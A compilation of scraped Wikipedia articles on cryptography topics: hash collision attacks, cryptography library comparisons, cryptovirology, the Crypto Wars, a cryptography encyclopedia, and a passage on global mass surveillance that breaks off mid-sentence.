2008,[6]and at least one Microsoft code-signing certificate was still using MD5 in May 2012. TheFlamemalware successfully used a new variation of a chosen-prefix collision attack to spoofcode signingof its components by a Microsoft root certificate that still used the compromised MD5 algorithm.[7][8] In 2019, researchers found a chosen-prefix collision attack againstSHA-1with computing complexity between 266.9and 269.4and cost less than 100,000 US dollars.[9][10]In 2020, researchers reduced the complexity of a chosen-prefix collision attack against SHA-1 to 263.4.[11] Many applications of cryptographic hash functions do not rely oncollision resistance, thus collision attacks do not affect their security. For example,HMACsare not vulnerable.[12]For the attack to be useful, the attacker must be in control of the input to the hash function. Becausedigital signaturealgorithms cannot sign a large amount of data efficiently, most implementations use a hash function to reduce ("compress") the amount of data that needs to be signed down to a constant size. Digital signature schemes often become vulnerable to hash collisions as soon as the underlying hash function is practically broken; techniques like randomized (salted) hashing will buy extra time by requiring the harderpreimage attack.[13] The usual attack scenario goes like this: In 2008, researchers used a chosen-prefix collision attack againstMD5using this scenario, to produce a roguecertificate authoritycertificate. They created two versions of aTLSpublic key certificate, one of which appeared legitimate and was submitted for signing by the RapidSSL certificate authority. The second version, which had the same MD5 hash, contained flags which signal web browsers to accept it as a legitimate authority for issuing arbitrary other certificates.[14] Hash flooding(also known asHashDoS[15]) is adenial of serviceattack that uses hash collisions to exploit the worst-case (linear probe) runtime ofhash tablelookups.[16]It was originally described in 2003 as an example of an algorithmic complexity attack.[17]To execute such an attack, the attacker sends the server multiple pieces of data that hash to the same value and then tries to get the server to perform slow lookups. As the main focus of hash functions used in hash tables was speed instead of security, most major programming languages were affected,[17]with new vulnerabilities of this class still showing up a decade after the original presentation.[16] To prevent hash flooding without making the hash function overly complex, newerkeyed hash functionsare introduced, with the security objective that collisions are hard to find as long as the key is unknown. They may be slower than previous hashes, but are still much easier to compute than cryptographic hashes. As of 2021, Jean-Philippe Aumasson andDaniel J. Bernstein'sSipHash(2012) is the most widely-used hash function in this class.[18](Non-keyed "simple" hashes remain safe to use as long as the application's hash table is not controllable from the outside.) It is possible to perform an analogous attack to fill upBloom filtersusing a (partial) preimage attack.[19]
https://en.wikipedia.org/wiki/Collision_attack
The tables below comparecryptographylibrariesthat deal with cryptography algorithms and haveapplication programming interface(API) function calls to each of the supported features. Micro Edition Suite: 5.0.3 (December 3, 2024; 5 months ago(2024-12-03)[8])[±]Crypto-J: 7.0.1 (March 17, 2025; 60 days ago(2025-03-17)[9])[±] 6.3.1 (May 15, 2025; 1 day ago(2025-05-15)[10])[±] 23.0.1 (October 15, 2024; 7 months ago(2024-10-15)[13])[±]21.0.5LTS(October 15, 2024; 7 months ago(2024-10-15)[14])[±]17.0.13 LTS (October 15, 2024; 7 months ago(2024-10-15)[15])[±]11.0.25 LTS (October 15, 2024; 7 months ago(2024-10-15)[16])[±]8u431 LTS (October 15, 2024; 7 months ago(2024-10-15)[17])[±] 2.27.0 (July 7, 2021; 3 years ago(2021-07-07))[±]2.16.11 (July 7, 2021; 3 years ago(2021-07-07))[±] 3.10.1[23]2024-12-30 This table denotes, if a cryptography library provides the technical requisites forFIPS 140, and the status of their FIPS 140 certification (according toNIST's CMVP search,[27]modules in process list[28]and implementation under test list).[29] Key operations include key generation algorithms, key exchange agreements, and public key cryptography standards. Comparison of supportedcryptographic hash functions. Here hash functions are defined as taking an arbitrary length message and producing a fixed size output that is virtually impossible to use for recreating the original message. Comparison of implementations ofmessage authentication code(MAC) algorithms. A MAC is a short piece of information used to authenticate a message—in other words, to confirm that the message came from the stated sender (its authenticity) and has not been changed in transit (its integrity). Table compares implementations of block ciphers. Block ciphers are defined as being deterministic and operating on a set number of bits (termed a block) using a symmetric key. Each block cipher can be broken up into the possible key sizes and block cipher modes it can be run with. The table below shows the support of variousstream ciphers. Stream ciphers are defined as using plain text digits that are combined with a pseudorandom cipher digit stream. Stream ciphers are typically faster than block ciphers and may have lower hardware complexity, but may be more susceptible to attacks. These tables compare the ability to use hardware enhanced cryptography. By using the assistance of specific hardware, the library can achieve greater speeds and/or improved security than otherwise. (kSLOC = 1000 lines of source code)
https://en.wikipedia.org/wiki/Comparison_of_cryptography_libraries
Cryptovirologyrefers to the study ofcryptographyuse inmalware, such asransomwareand asymmetricbackdoors.[citation needed]Traditionally, cryptography and its applications are defensive in nature, and provide privacy,authentication, and security to users. Cryptovirology employs a twist on cryptography, showing that it can also be used offensively. It can be used to mount extortion based attacks that cause loss of access to information, loss of confidentiality, and information leakage, tasks which cryptography typically prevents.[1] The field was born with the observation thatpublic-key cryptographycan be used to break the symmetry between what anantivirusanalyst sees regarding malware and what the attacker sees. The antivirus analyst sees a public key contained in the malware, whereas the attacker sees the public key contained in the malware as well as the corresponding private key (outside the malware) since the attacker created the key pair for the attack. The public key allows the malware to performtrapdoor one-wayoperations on the victim's computer that only the attacker can undo. The field encompasses covert malware attacks in which the attackersecurelysteals private information such as symmetric keys, private keys,PRNGstate, and the victim's data. Examples of such covert attacks are asymmetricbackdoors. An asymmetric backdoor is a backdoor (e.g., in acryptosystem) that can be used only by the attacker, even after it is found. This contrasts with the traditional backdoor that is symmetric,i.e., anyone that finds it can use it.Kleptography, a subfield of cryptovirology, is the study of asymmetric backdoors in key generation algorithms,digital signaturealgorithms, key exchanges, pseudorandom number generators, encryption algorithms, and other cryptographic algorithms. The NISTDual EC DRBGrandom bit generator has an asymmetric backdoor in it. The EC-DRBG algorithm utilizes the discrete-log kleptogram from kleptography, which by definition makes the EC-DRBG a cryptotrojan. Like ransomware, the EC-DRBG cryptotrojan contains and uses the attacker's public key to attack the host system. The cryptographer Ari Juels indicated that NSA effectively orchestrated a kleptographic attack on users of the Dual EC DRBG pseudorandom number generationalgorithmand that, although security professionals and developers have been testing and implementing kleptographic attacks since 1996, "you would be hard-pressed to find one in actual use until now."[2]Due to public outcry about this cryptovirology attack, NIST rescinded the EC-DRBG algorithm from the NIST SP 800-90 standard.[3] Covert information leakage attacks carried out by cryptoviruses, cryptotrojans, and cryptoworms that, by definition, contain and use the public key of the attacker is a major theme in cryptovirology. In "deniable password snatching," a cryptovirus installs a cryptotrojan that asymmetrically encrypts host data and covertly broadcasts it. This makes it available to everyone, noticeable by no one (except the attacker),[citation needed]and only decipherable by the attacker. An attacker caught installing the cryptotrojan claims to be a virus victim.[citation needed]An attacker observed receiving the covert asymmetric broadcast is one of the thousands, if not millions of receivers, and exhibits no identifying information whatsoever. The cryptovirology attack achieves "end-to-end deniability." It is a covert asymmetric broadcast of the victim's data. Cryptovirology also encompasses the use ofprivate information retrieval(PIR) to allow cryptoviruses to search for and steal host data without revealing the data searched for even when the cryptotrojan is under constant surveillance.[4]By definition, such a cryptovirus carries within its own coding sequence the query of the attacker and the necessary PIR logic to apply the query to host systems. The first cryptovirology attack and discussion of the concept was by Adam L. Young andMoti Yung, at the time called "cryptoviral extortion" and it was presented at the 1996 IEEE Security & Privacy conference.[1][5]In this attack, a cryptovirus, cryptoworm, or cryptotrojan contains the public key of the attacker andhybrid encryptsthe victim's files. The malware prompts the user to send the asymmetric ciphertext to the attacker who will decipher it and return the symmetric decryption key it contains for a fee. The victim needs the symmetric key to decrypt the encrypted files if there is no way to recover the original files (e.g., from backups). The 1996 IEEE paper predicted that cryptoviral extortion attackers would one day demande-money, long beforeBitcoineven existed. Many years later, the media relabeled cryptoviral extortion asransomware. In 2016, cryptovirology attacks on healthcare providers reached epidemic levels, prompting the U.S.Department of Health and Human Servicesto issue a Fact Sheet on Ransomware andHIPAA.[6]The fact sheet states that when electronic protected health information is encrypted by ransomware, a breach has occurred, and the attack therefore constitutes adisclosurethat is not permitted under HIPAA, the rationale being that an adversary has taken control of the information. Sensitive data might never leave the victim organization, but the break-in may have allowed data to be sent out undetected. California enacted a law that defines the introduction of ransomware into a computer system with the intent of extortion as being against the law.[7] While viruses in the wild have used cryptography in the past, the only purpose of such usage of cryptography was to avoid detection byantivirus software. For example, the tremor virus[8]used polymorphism as a defensive technique in an attempt to avoid detection by anti-virus software. Though cryptography does assist in such cases to enhance the longevity of a virus, the capabilities of cryptography are not used in the payload. The One-half virus was amongst the first viruses known to have encrypted affected files. An example of a virus that informs the owner of the infected machine to pay a ransom is the virus nicknamed Tro_Ransom.A.[9]This virus asks the owner of the infected machine to send $10.99 to a given account throughWestern Union.Virus.Win32.Gpcode.agis a classic cryptovirus.[10]This virus partially uses a version of 660-bitRSAand encrypts files with many different extensions. It instructs the owner of the machine to email a given mail ID if the owner desires the decryptor. If contacted by email, the user will be asked to pay a certain amount as ransom in return for the decryptor. It has been demonstrated that using just 8 different calls toMicrosoft'sCryptographic API(CAPI), a cryptovirus can satisfy all its encryption needs.[11] Apart from cryptoviral extortion, there are other potential uses of cryptoviruses,[4]such as deniable password snatching, cryptocounters,private information retrieval, and in secure communication between different instances of a distributed cryptovirus.
https://en.wikipedia.org/wiki/Cryptovirology
Attempts, unofficially dubbed the "Crypto Wars", have been made by theUnited States(US) and allied governments to limit the public's and foreign nations' access tocryptographystrong enough to thwartdecryptionby national intelligence agencies, especially theNational Security Agency(NSA).[1][2] In the early days of theCold War, the U.S. and its allies developed an elaborate series of export control regulations designed to prevent a wide range of Western technology from falling into the hands of others, particularly theEastern bloc. All export of technology classed as 'critical' required a license.CoComwas organized to coordinate Western export controls. Two types of technology were protected: technology associated only with weapons of war ("munitions") and dual use technology, which also had commercial applications. In the U.S., dual use technology export was controlled by theDepartment of Commerce, while munitions were controlled by theState Department. Since in the immediate postWWIIperiod the market for cryptography was almost entirely military, the encryption technology (techniques as well as equipment and, after computers became important, crypto software) was included as a Category XIII item into theUnited States Munitions List. The multinational control of the export of cryptography on the Western side of the cold war divide was done via the mechanisms of CoCom. By the 1960s, however, financial organizations were beginning to require strong commercialencryptionon the rapidly growing field of wired money transfer. The U.S. Government's introduction of theData Encryption Standardin 1975 meant that commercial uses of high quality encryption would become common, and serious problems of export control began to arise. Generally these were dealt with through case-by-case export license request proceedings brought by computer manufacturers, such asIBM, and by their large corporate customers. Encryption export controls became a matter of public concern with the introduction of thepersonal computer.Phil Zimmermann'sPGPcryptosystemand its distribution on theInternetin 1991 was the first major 'individual level' challenge to controls on export of cryptography. The growth ofelectronic commercein the 1990s created additional pressure for reduced restrictions.[3]Shortly afterward,Netscape'sSSLtechnology was widely adopted as a method for protecting credit card transactions usingpublic key cryptography. SSL-encrypted messages used theRC4cipher, and used 128-bitkeys. U.S. government export regulations would not permit crypto systems using 128-bit keys to be exported.[4]At this stage Western governments had, in practice, a split personality when it came to encryption; policy was made by the military cryptanalysts, who were solely concerned with preventing their 'enemies' acquiring secrets, but that policy was then communicated to commerce by officials whose job was to support industry. The longestkey sizeallowed for export without individual license proceedings was40 bits, so Netscape developed two versions of itsweb browser. The "U.S. edition" had the full 128-bit strength. The "International Edition" had its effective key length reduced to 40 bits by revealing 88 bits of the key in the SSLprotocol. Acquiring the 'U.S. domestic' version turned out to be sufficient hassle that most computer users, even in the U.S., ended up with the 'International' version,[5]whose weak40-bit encryptioncould be broken in a matter of days using a single personal computer. A similar situation occurred withLotus Notesfor the same reasons.[6] Legal challengesbyPeter Jungerand other civil libertarians and privacy advocates, the widespread availability of encryption software outside the U.S., and the perception by many companies that adverse publicity aboutweak encryptionwas limiting their sales and the growth of e-commerce, led to a series of relaxations in US export controls, culminating in 1996 in PresidentBill Clintonsigning theExecutive order13026[7]transferring the commercial encryption from the Munition List to theCommerce Control List. Furthermore, the order stated that, "the software shall not be considered or treated as 'technology'" in the sense ofExport Administration Regulations. This order permitted theUnited States Department of Commerceto implement rules that greatly simplified the export of proprietary andopen sourcesoftware containing cryptography, which they did in 2000.[8] As of 2009, non-military cryptography exports from the U.S. are controlled by the Department of Commerce'sBureau of Industry and Security.[9]Some restrictions still exist, even for mass market products, particularly with regard to export to "rogue states" andterroristorganizations. Militarized encryption equipment,TEMPEST-approved electronics, custom cryptographic software, and even cryptographic consulting services still require an export license[9](pp. 6–7). Furthermore, encryption registration with the BIS is required for the export of "mass market encryption commodities, software and components with encryption exceeding 64 bits" (75FR36494). In addition, other items require a one-time review by or notification to BIS prior to export to most countries.[9]For instance, the BIS must be notified before open-source cryptographic software is made publicly available on the Internet, though no review is required.[10]Export regulations have been relaxed from pre-1996 standards, but are still complex.[9]Other countries, notably those participating in theWassenaar Arrangement,[11]have similar restrictions.[12] Until 1996, thegovernment of the United Kingdomwithheld export licenses from exporters unless they used weak ciphers or short keys, and generally discouraged practical public cryptography.[13]A debate about cryptography for the NHS brought this out in the open.[13] The Clipper chip was designed for the NSA in the 1990s for secure landline phones, which implemented encryption with an announcedbackdoorfor the US government.[3]The US government tried to get manufacturers to adopt the chip, but without success. Meanwhile, much stronger software encryption became available worldwide. Academics also demonstrated fatal flaws in the chip's backdoor protocol. The effort was finally abandoned by 1996. A5/1is astream cipherused to provide over-the-air communicationprivacyin theGSMcellular telephonestandard. Security researcherRoss Andersonreported in 1994 that "there was a terrific row between theNATOsignal intelligence agenciesin the mid-1980s over whether GSM encryption should be strong or not. The Germans said it should be, as they shared a long border with theWarsaw Pact; but the other countries didn't feel this way, and the algorithm as now fielded is a French design."[14] According to professor Jan Arild Audestad, at the standardization process which started in 1982, A5/1 was originally proposed to have a key length of 128 bits. At that time, 128 bits was projected to be secure for at least 15 years. It is now estimated that 128 bits would in fact also still be secure as of 2014. Audestad, Peter van der Arend, andThomas Haugsay that the British insisted on weaker encryption, with Haug saying he was told by the British delegate that this was to allow the British secret service to eavesdrop more easily. The British proposed a key length of 48 bits, while the West Germans wanted stronger encryption to protect against East German spying, so the compromise became a key length of 56 bits.[15]In general, a key of length 56 is2128−56=272=4.7×1021{\displaystyle 2^{128-56}=2^{72}=4.7\times 10^{21}}times easier to break than a key of length 128. The widely usedDESencryption algorithm was originally planned by IBM to have a key size of 128 bits;[16]the NSA lobbied for a key size of 48 bits. The end compromise were a key size of 64 bits, 8 of which were parity bits, to make an effective key security parameter of 56 bits.[17]DES was considered insecure as early as 1977,[18]and documents leaked in the 2013Snowden leakshows that it was in fact easily crackable by the NSA, but was still recommended byNIST.[19]TheDES Challengeswere a series ofbrute force attackcontests created byRSA Securityto highlight the lack of security provided by theData Encryption Standard. As part of the successful cracking of the DES-encoded messages, the EFF constructed a specialized DES cracking computer nicknamedDeep Crack. The successful cracking of DES likely helped to gather both political and technical support for more advanced encryption in the hands of ordinary citizens.[20]In 1997, NIST began acompetition to select a replacement for DES, resulting in the publication in 2000 of theAdvanced Encryption Standard(AES).[21]AES is still considered secure as of 2019, and the NSA considers AES strong enough to protect information classified at the Top Secret level.[22] Fearing widespread adoption of encryption, the NSA set out to stealthily influence and weaken encryption standards and obtain master keys—either by agreement, by force of law, or by computer network exploitation (hacking).[3][23] According to theNew York Times: "But by 2006, an N.S.A. document notes, the agency had broken into communications for three foreign airlines, one travel reservation system, one foreign government's nuclear department and another's Internet service by cracking the virtual private networks that protected them. By 2010, the Edgehill program, the British counterencryption effort, was unscrambling VPN traffic for 30 targets and had set a goal of an additional 300."[23] As part of Bullrun, NSA has also been actively working to "insert vulnerabilities into commercial encryption systems, IT systems, networks, and endpoint communications devices used by targets".[24]The New York Timeshas reported that the random number generatorDual EC DRBGcontains a back door from the NSA, which would allow the NSA to break encryption relying on that random number generator.[25]Even though Dual_EC_DRBG was known to be an insecure and slow random number generator soon after the standard was published, and the potential NSA backdoor was found in 2007, and alternative random number generators without these flaws were certified and widely available,RSA Securitycontinued using Dual_EC_DRBG in the company'sBSAFE toolkitandData Protection Manageruntil September 2013. While RSA Security has denied knowingly inserting a backdoor into BSAFE, it has not yet given an explanation for the continued usage of Dual_EC_DRBG after its flaws became apparent in 2006 and 2007,[26]however it was reported on December 20, 2013, that RSA had accepted a payment of $10 million from the NSA to set the random number generator as the default.[27][28]Leaked NSA documents state that their effort was "a challenge in finesse" and that "Eventually, N.S.A. became the sole editor" of the standard. By 2010, the NSA had developed "groundbreaking capabilities" against encrypted Internet traffic. A GCHQ document warned however "These capabilities are among the Sigint community's most fragile, and the inadvertent disclosure of the simple 'fact of' could alert the adversary and result in immediate loss of the capability."[23]Another internal document stated that "there will be NO 'need to know.'"[23]Several experts, includingBruce SchneierandChristopher Soghoian, have speculated that a successful attack againstRC4, a 1987 encryption algorithm still used in at least 50 per cent of all SSL/TLS traffic is a plausible avenue, given several publicly known weaknesses of RC4.[29]Others have speculated that NSA has gained ability to crack 1024-bitRSAandDiffie–Hellmanpublic keys.[30]A team of researchers have pointed out that there is wide reuse of a few non-ephemeral 1024 bit primes in Diffie–Hellman implementations, and that NSA having done precomputation against those primes in order to break encryption using them in real time is very plausibly what NSA's "groundbreaking capabilities" refer to.[31] The Bullrun program is controversial, in that it is believed that NSA deliberately inserts or keeps secret vulnerabilities which affect both law-abiding US citizens as well as NSA's targets, under itsNOBUSpolicy.[32]In theory, NSA has two jobs: prevent vulnerabilities that affect the US, and find vulnerabilities that can be used against US targets; but as argued by Bruce Schneier, NSA seems to prioritize finding (or even creating) and keeping vulnerabilities secret. Bruce Schneier has called for the NSA to be broken up so that the group charged with strengthening cryptography is not subservient to the groups that want to break the cryptography of its targets.[33] As part of the Snowden leaks, it became widely known that intelligence agencies could bypass encryption of data stored on Android andiOSsmartphones by legally ordering Google and Apple to bypass the encryption on specific phones. Around 2014, as a reaction to this, Google and Apple redesigned their encryption so that they did not have the technical ability to bypass it, and it could only be unlocked by knowing the user's password.[34][35] Various law enforcements officials, including theObama administration's Attorney GeneralEric Holder[36]responded with strong condemnation, calling it unacceptable that the state could not access alleged criminals' data even with a warrant. In one of the more iconic responses, the chief of detectives for Chicago's police department stated that "Apple will become the phone of choice for the pedophile".[37]Washington Post posted an editorial insisting that "smartphone users must accept that they cannot be above the law if there is a valid search warrant", and after agreeing that backdoors would be undesirable, suggested implementing a "golden key" backdoor which would unlock the data with a warrant.[38][39] FBI Director James Comey cited a number of cases to support the need to decrypt smartphones. Interestingly, in none of the presumably carefully handpicked cases did the smartphone have anything to do with the identification or capture of the culprits, and the FBI seems to have been unable to find any strong cases supporting the need for smartphone decryption.[40] Bruce Schneierhas labelled the right to smartphone encryption debateCrypto Wars II,[41]whileCory Doctorowcalled itCrypto Wars redux.[42] Legislators in the US states of California[43]and New York[44]have proposed bills to outlaw the sale of smartphones with unbreakable encryption. As of February 2016, no bills have been passed. In February 2016 the FBI obtained a court order demanding that Apple create andelectronically signnew software which would enable the FBI to unlock aniPhone 5cit recovered fromone of the shootersin the 2015 terroristattack in San Bernardino, California. Apple challenged the order. In the end the FBI hired a third party to crack the phone.SeeFBI–Apple encryption dispute. In April 2016,Dianne FeinsteinandRichard Burrsponsored a bill, described as "overly vague" by some,[45]that would be likely to criminalise all forms ofstrong encryption.[46][47] In December 2019, theUnited States Senate Committee on the Judiciaryconvened a hearing on Encryption and Lawful Access, focusing on encrypted smartphone storage.[48]District AttorneyCyrus Vance Jr., Professor Matt Tait, Erik Neuenschwander from Apple, and Jay Sullivan from Facebook testified. ChairmanLindsey Grahamstated in his opening remarks "all of us want devices that protect our privacy." He also said law enforcement should be able to read encrypted data on devices, threatening to pass legislation if necessary: "You're going to find a way to do this or we're going to do this for you."[49] In October 2017, Deputy Attorney GeneralRod Rosensteincalled for key escrow under the euphemism "responsible encryption"[50]as a solution to the ongoing problem of "going dark".[51]This refers to wiretapping court orders and police measures becoming ineffective as strongend-to-end encryptionis increasingly added to widespread messenger products. Rosenstein suggestedkey escrowwould provide their customers with a way to recover their encrypted data if they forget their password, so that it is not lost forever. From a law enforcement perspective, this would allow a judge to issue a search warrant instructing the company to decrypt the data; without escrow or other undermining of encryption it is impossible for a service provider to comply with this request. In contrast to previous proposals, the decentralized storage of keys by companies instead of government agencies is claimed to be an additional safeguard. In 2015 the head of the NSA,Admiral Michael S. Rogers, suggested further decentralizing the key escrow by introducing "front doors" instead of back doors into encryption.[52]This way, the key would be split into two halves: one kept by government authorities and the other by the company responsible for the encryption product. The government would thus still need a search warrant to obtain the company's half-key, while the company would be unable to abuse the key escrow to access users' data without the government's half-key. Experts were not impressed.[53][52] In 2018, the NSA promoted the use of "lightweight encryption", in particular its ciphersSimonandSpeck, forInternet of Thingsdevices.[54]However, the attempt to have those ciphers standardized by ISO failed because of severe criticism raised by the board of cryptography experts which provoked fears that the NSA had non-public knowledge of how to break them.[55] Following the 2015Charlie Hebdoshooting, a terrorism attack, formerUK Prime MinisterDavid Cameroncalled for outlawing non-backdoored cryptography, saying that there should be no "means of communication" which "we cannot read".[56][57]US president Barack Obama sided with Cameron on this.[58]This call for action does not seem to have resulted in any legislation or changes in the status quo of non-backdoored cryptography being legal and available. TheEliminating Abusive and Rampant Neglect of Interactive Technologies(EARN IT) Act of 2020 provides for a 19-member National Commission which will develop a set of "best practice" guidelines to which technology providers will have to conform in order to "earn" immunity (traditionally provided 'automatically' bySection 230 of the Communications Decency Act) to liability for child sexual abuse material on their platforms. Proponents present it as a way to tackle child sexual abuse material on internet platforms, but it has been criticized by advocates of encryption because it is likely that the "best practices" devised by the commission will include refraining from using end-to-end encryption, as such encryption would make it impossible to screen for illegal content.[59][60]
https://en.wikipedia.org/wiki/Crypto_Wars
TheEncyclopedia of Cryptography and Securityis a comprehensive work onCryptographyfor bothinformation securityprofessionals and experts in the fields ofComputer Science,Applied Mathematics,Engineering,Information Theory, Data Encryption, etc.[1]It consists of 460 articles in alphabetical order and is available electronically and in print. The Encyclopedia has a representative Advisory Board consisting of 18 leading international specialists. Topics include but are not limited to authentication and identification, copy protection, cryptoanalysis and security, factorization algorithms andprimality tests,cryptographic protocols, key management, electronic payments and digital certificates,hash functionsand MACs,elliptic curvecryptography,quantum cryptographyandweb security. The style of the articles is of explanatory character and can be used for undergraduate or graduate courses.
https://en.wikipedia.org/wiki/Encyclopedia_of_Cryptography_and_Security
Global mass surveillancecan be defined as themass surveillanceof entire populations across national borders.[1] Its existence was not widely acknowledged by governments and the mainstream media until theglobal surveillance disclosuresbyEdward Snowdentriggered a debate about theright to privacyin theDigital Age.[2][3]One such debate is the balance which governments must acknowledge between the pursuit of national security and counter-terrorism over a right to privacy. Although, to quote H. Akın Ünver "Even when conducted for national security and counterterrorism purposes, the scale and detail of mass citizen data collected, leads to rightfully pessimistic observations about individual freedoms and privacy".[4] Its roots can be traced back to the middle of the 20th century when theUKUSA Agreementwas jointly enacted by the United Kingdom and the United States, which later expanded to Canada, Australia, and New Zealand to create the presentFive Eyesalliance.[5]The alliance developed cooperation arrangements with several "third-party" nations. Eventually, this resulted in the establishment of a global surveillance network, code-named "ECHELON" (1971).[6][7] Theorigins of global surveillancecan be traced back to the late 1940s after theUKUSA Agreementwas collaboratively enacted by the United Kingdom and the United States, which eventually culminated in the creation of the global surveillance network code-named "ECHELON" in 1971.[6][7] In the aftermath of the1970s Watergate affairand a subsequentcongressional inquiryled by Sen.Frank Church,[8]it was revealed that theNSA, in collaboration with Britain's GCHQ, had routinely intercepted the international communications of prominent anti-Vietnam Warleaders such asJane Fondaand Dr.Benjamin Spock.[9]Decades later, a multi-year investigation by theEuropean Parliamenthighlighted the NSA's role ineconomic espionagein a report entitled 'Development of Surveillance Technology and Risk of Abuse of Economic Information', in 1999.[10] However, for the general public, it was a series of detailed disclosures of internal NSA documents in June 2013 that first revealed the massive extent of the NSA's spying, both foreign and domestic. Most of these were leaked by an ex-contractor,Edward Snowden. Even so, a number of these older global surveillance programs such asPRISM,XKeyscore, andTemporawere referenced in the 2013 release of thousands of documents.[11]Many countries around the world, includingWestern Alliesand member states ofNATO, have been targeted by the "Five Eyes" strategic alliance of Australia, Canada, New Zealand, the UK, and the United States—five English-speakingWestern countriesaiming to achieveTotal Information Awarenessbymastering the Internetwith analytical tools such as theBoundless Informant.[12]As confirmed by the NSA's directorKeith B. Alexanderon 26 September 2013, the NSA collects and stores all phone records of all American citizens.[13]Much of the data is kept in large storage facilities such as theUtah Data Center, a US $1.5 billionmegaprojectreferred to byThe Wall Street Journalas a "symbol of the spy agency's surveillance prowess."[14] Today, this global surveillance system continues to grow. It now collects so much digital detritus – e-mails, calls, text messages, cellphone location data and a catalog of computer viruses - that the N.S.A. is building a1-million-square-foot facility in the Utah desertto store and process it. On 6 June 2013, Britain'sThe Guardiannewspaper began publishing a series of revelations by an as yet unknown American whistleblower, revealed several days later to be ex-CIA and ex-NSA-contracted systems analyst Edward Snowden. Snowden gave a cache of documents to two journalists,Glenn GreenwaldandLaura Poitras. Greenwald later estimated that the cache contains 15,000–20,000 documents, some very large and detailed, and some very small.[16][17]In over two subsequent months of publications, it became clear that the NSA had operated a complex web of spying programs that allowed it to intercept Internet and telephone conversations from over a billion users from dozens of countries around the world. Specific revelations were made about China, the European Union, Latin America, Iran and Pakistan, and Australia and New Zealand, however, the published documentation reveals that many of the programs indiscriminately collected bulk information directly from central servers and Internet backbones, which almost invariably carry and reroute information from distant countries.[citation needed] Due to this central server and backbone monitoring, many of the programs overlapped and interrelated with one another. These programs were often carried out with the assistance of US entities such as theUnited States Department of Justiceand theFBI,[18]were sanctioned by US laws such as theFISA Amendments Act, and the necessary court orders for them were signed by the secretForeign Intelligence Surveillance Court. Some of the NSA's programs were directly aided by national and foreign intelligence agencies, Britain'sGCHQand Australia'sASD, as well as by large private telecommunications and Internet corporations, such asVerizon,Telstra,[19]Google, and Facebook.[20] Snowden's disclosures of the NSA's surveillance activities are a continuation ofnews leakswhich have been ongoing since the early 2000s. One year after theSeptember 11, 2001, attacks, former U.S. intelligence officialWilliam Binneywas publicly critical of the NSA for spying on U.S. citizens.[21] Further disclosures followed. On 16 December 2005,The New York Timespublished a report under the headline "BushLets U.S. Spy on Callers Without Courts."[22]In 2006, further evidence of the NSA's domestic surveillance of U.S. citizens was provided byUSA Today. The newspaper released a report on 11 May 2006, regarding the NSA's "massive database" of phone records collected from "tens of millions" of U.S. citizens. According toUSA Today, these phone records were provided by several telecom companies such asAT&T,Verizon, andBellSouth.[23]In 2008, the security analystBabak Pasdarrevealed the existence of the so-called "Quantico circuit" that he and his team discovered in 2003 when brought on to update the carrier's security system. The circuit provided the U.S. federal government with a backdoor into the network of an unnamed wireless provider, which was later independently identified asVerizon.[24] Snowden made his first contact with journalistGlenn GreenwaldofThe Guardianin late 2012.[25]Thetimeline of mass surveillance disclosuresby Snowden continued throughout the entire year of 2013. Documents leaked by Snowden in 2013 include court orders, memos, and policy documents related to a wide range of surveillance activities. According to the April 2013 summary of documents leaked by Snowden, other than to combat terrorism, these surveillance programs were employed to assess the foreign policy and economic stability of other countries,[26]and to gather "commercial secrets".[27] In a statement addressed to theNational Congress of Brazilin early August 2013, journalistGlenn Greenwaldmaintained that the U.S. government had usedcounter-terrorismas a pretext for clandestine surveillance in order to compete with other countries in the "business, industrial and economic fields".[28][29]In a December 2013 letter to theBrazilian government, Snowden wrote that "These programs were never about terrorism: they're about economic spying, social control, and diplomatic manipulation. They're aboutpower."[30]According to a White House panel member, the NSA didn't stop any terrorist attack.[31]However the NSA chief stated that surveillance programs stopped 54 terrorist plots.[32] In an interview withDer Spiegelpublished on 12 August 2013, former NSA DirectorMichael Haydenadmitted that "We (the NSA) steal secrets. We're number one in it". Hayden also added: "We steal stuff to make you safe, not to make you rich".[26] According to documents seen by the news agencyReuters, these "secrets" were subsequently funneled to authorities across the nation to help them launch criminal investigations of Americans.[33]Federal agents are then instructed to "recreate" the investigative trail in order to "cover up" where the information originated.[33] According to the congressional testimony ofKeith B. Alexander,Director of the National Security Agency, one of the purposes of its data collection is to store all the phone records inside a place that can be searched and assessed at all times. When asked by SenatorMark Udallif the goal of the NSA is to collect the phone records of all Americans, Alexander replied, "Yes, I believe it is in the nation's best interest to put all the phone records into a lockbox that we could search when the nation needs to do it."[34] Other applications of global surveillance include the identification and containment of emerging global outbreaks. In 2003, global surveillance mechanisms were used to fight against theSARspandemic.[35] In theUnited States, the NSA is collecting the phone records of more than 300 million Americans.[36]The international surveillance toolXKeyscoreallows government analysts to search through vast databases containing emails, online chats and the browsing histories of millions of individuals.[37][38][39]Britain's global surveillance programTemporaintercepts thefibre-opticcables that form the backbone of the Internet.[40]Under the NSA'sPRISMsurveillance program, data that has already reached its final destination would be directly harvested from the servers of the following U.S. service providers:Microsoft,Yahoo!,Google,Facebook,Paltalk,AOL,Skype,YouTube, andApple Inc.[41][42] Contact chaining is a method that involves utilizing data related to social links among individuals, including call logs that connect phone numbers with each other, in order to pinpoint individuals associated with criminal groups. However, a lack of privacy guidelines can result in this process amassing an extensive portion of user data.[45] The NSA uses the analysis of phone call and e-mail logs of American citizens to create sophisticated graphs of their social connections that can identify their associates, their locations at certain times, their traveling companions and other personal information.[44] According totop secretNSA documents leaked by Snowden, during a single day in 2012, the NSA collectede-mailaddress booksfrom: Each day, the NSA collects contacts from an estimated 500,000buddy listson live-chat services as well as from the inbox displays of Web-based e-mail accounts.[46]Taken together, the data enables the NSA to draw detailed maps of a person's life based on their personal, professional, religious and political connections.[46] Federal agencies in the United States: Data gathered by these surveillance programs is routinely shared with the U.S.Federal Bureau of Investigation(FBI) and the U.S.Central Intelligence Agency(CIA).[47]In addition, the NSA supplies domestic intercepts to theDrug Enforcement Administration(DEA),Internal Revenue Service(IRS), and other law enforcement agencies.[33] Foreign countries: As a result of the NSA'ssecret treatieswith foreign countries, data gathered by its surveillance programs are routinely shared with countries who are signatories to theUKUSA Agreement. These foreign countries also help to operate several NSA programs such asXKEYSCORE. (SeeInternational cooperation.) A special branch of the NSA called "Follow the Money" (FTM) monitors international payments, banking and credit card transactions and later stores the collected data in the NSA's financial databank, "Tracfin".[48] Mobile phone trackingrefers to the act of attaining the position and coordinates of a mobile phone. According toThe Washington Post, the NSA has been tracking the locations of mobile phones from all over the world by tapping into the cables that connect mobile networks globally and that serve U.S. cellphones as well as foreign ones. In the process of doing so, the NSA collects more than 5 billion records of phone locations on a daily basis. This enables NSA analysts to map cellphone 